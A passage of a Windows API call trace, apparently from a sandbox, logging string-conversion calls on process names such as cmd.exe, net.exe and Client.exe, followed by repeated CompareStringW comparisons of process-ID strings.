lpWideCharStr="audiodg.exeegnize.exeey.exe£lj") returned 11 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="taskeng.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="taskeng.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskeng.exe", lpUsedDefaultChar=0x0) returned 11 [0288.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="taskeng.exeegnize.exeey.exe£lj") returned 11 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="88.exe", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="88.exe", cchWideChar=6, lpMultiByteStr=0xa11f0c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="88.exe", lpUsedDefaultChar=0x0) returned 6 [0288.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=6, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="88.exeg.exeegnize.exeey.exe£lj") returned 6 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7 [0288.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="cmd.exe.exeegnize.exeey.exe£lj") returned 7 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="99.exe", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="99.exe", cchWideChar=6, lpMultiByteStr=0xa11f0c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="99.exe", lpUsedDefaultChar=0x0) returned 6 [0288.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=6, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="99.exee.exeegnize.exeey.exe£lj") returned 6 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11 [0288.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="conhost.exeegnize.exeey.exe£lj") returned 11 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="net.exe", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="net.exe", cchWideChar=7, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="net.exe", lpUsedDefaultChar=0x0) returned 7 [0288.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=7, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="net.exe.exeegnize.exeey.exe£lj") returned 7 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="net1.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="net1.exe", cchWideChar=8, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="net1.exe", lpUsedDefaultChar=0x0) returned 8 [0288.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="net1.exeexeegnize.exeey.exe£lj") returned 8 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Client.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Client.exe", cchWideChar=10, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Client.exe", lpUsedDefaultChar=0x0) returned 10 [0288.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="Client.exeeegnize.exeey.exe£lj") returned 10 [0288.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="0", cchCount2=1) returned 2 [0288.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="0", cchCount2=1) returned 2 [0288.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="0", cchCount2=1) returned 2 [0288.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="4", cchCount2=1) returned 1 [0288.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2="4", cchCount2=1) returned 2 [0288.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="4", cchCount2=1) returned 1 [0288.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2="4", cchCount2=1) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="4", cchCount2=1) returned 1 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2="4", cchCount2=1) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0", cchCount1=1, lpString2="4", cchCount2=1) returned 1 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2="4", cchCount2=1) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="264", cchCount2=3) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="264", cchCount2=3) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="264", cchCount2=3) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="264", cchCount2=3) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="332", cchCount2=3) returned 1 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="332", cchCount2=3) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="332", cchCount2=3) returned 1 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="332", cchCount2=3) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="332", cchCount2=3) returned 1 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="332", cchCount2=3) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="332", cchCount2=3) returned 1 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="332", cchCount2=3) returned 2 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="368", cchCount2=3) returned 1 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="368", cchCount2=3) returned 1 [0288.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="368", cchCount2=3) returned 2 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="368", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="368", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="368", cchCount2=3) returned 2 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="368", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="368", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="368", cchCount2=3) returned 2 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="368", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="368", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="368", cchCount2=3) returned 2 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="380", cchCount2=3) returned 2 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="380", cchCount2=3) returned 2 [0288.958] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="380", cchCount2=3) returned 2 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="380", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="380", cchCount2=3) returned 2 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="420", cchCount2=3) returned 2 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="420", cchCount2=3) returned 2 [0288.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="420", cchCount2=3) returned 2 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="420", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="420", cchCount2=3) returned 2 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="456", cchCount2=3) returned 2 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="456", cchCount2=3) returned 2 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="456", cchCount2=3) returned 2 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="456", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="456", cchCount2=3) returned 2 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="464", cchCount2=3) returned 2 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="464", cchCount2=3) returned 2 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="464", cchCount2=3) returned 2 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="464", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="464", cchCount2=3) returned 2 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="472", cchCount2=3) returned 2 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="472", cchCount2=3) returned 2 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="472", cchCount2=3) returned 2 [0288.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="472", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="472", cchCount2=3) returned 2 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="332", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="368", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="380", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="420", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="456", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="464", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="472", cchCount1=3, lpString2="584", cchCount2=3) returned 1 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="584", cchCount1=3, lpString2="584", cchCount2=3) returned 2 [0288.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="264", cchCount1=3, lpString2="584", 